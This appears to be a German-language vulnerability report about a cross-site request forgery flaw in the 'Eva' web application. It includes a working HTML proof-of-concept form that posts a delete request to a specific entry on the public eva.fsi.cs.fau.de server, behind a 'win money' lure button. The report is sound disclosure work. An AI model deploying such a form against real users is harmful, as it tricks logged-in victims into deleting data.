[CSRF](https://en.wikipedia.org/wiki/Cross-site_request_forgery) ist relativ trivial möglich. Z.B gegen den testserver auf Port 5000 mit folgendem HTML: ```html <html> <body> <form method="POST" action="https://eva.fsi.cs.fau.de/moderation/edit/ef63f8b9abb91791aaad0552b5818848/"> <input type="submit" name="delete" value="Gewinne GELD!!!" /> </form> </body> </html> ``` **Vorsicht**: Auf den Button klicken und eingeloggt sein löscht eine Eva vom Thorsten auf dem öffentlichen eva-server.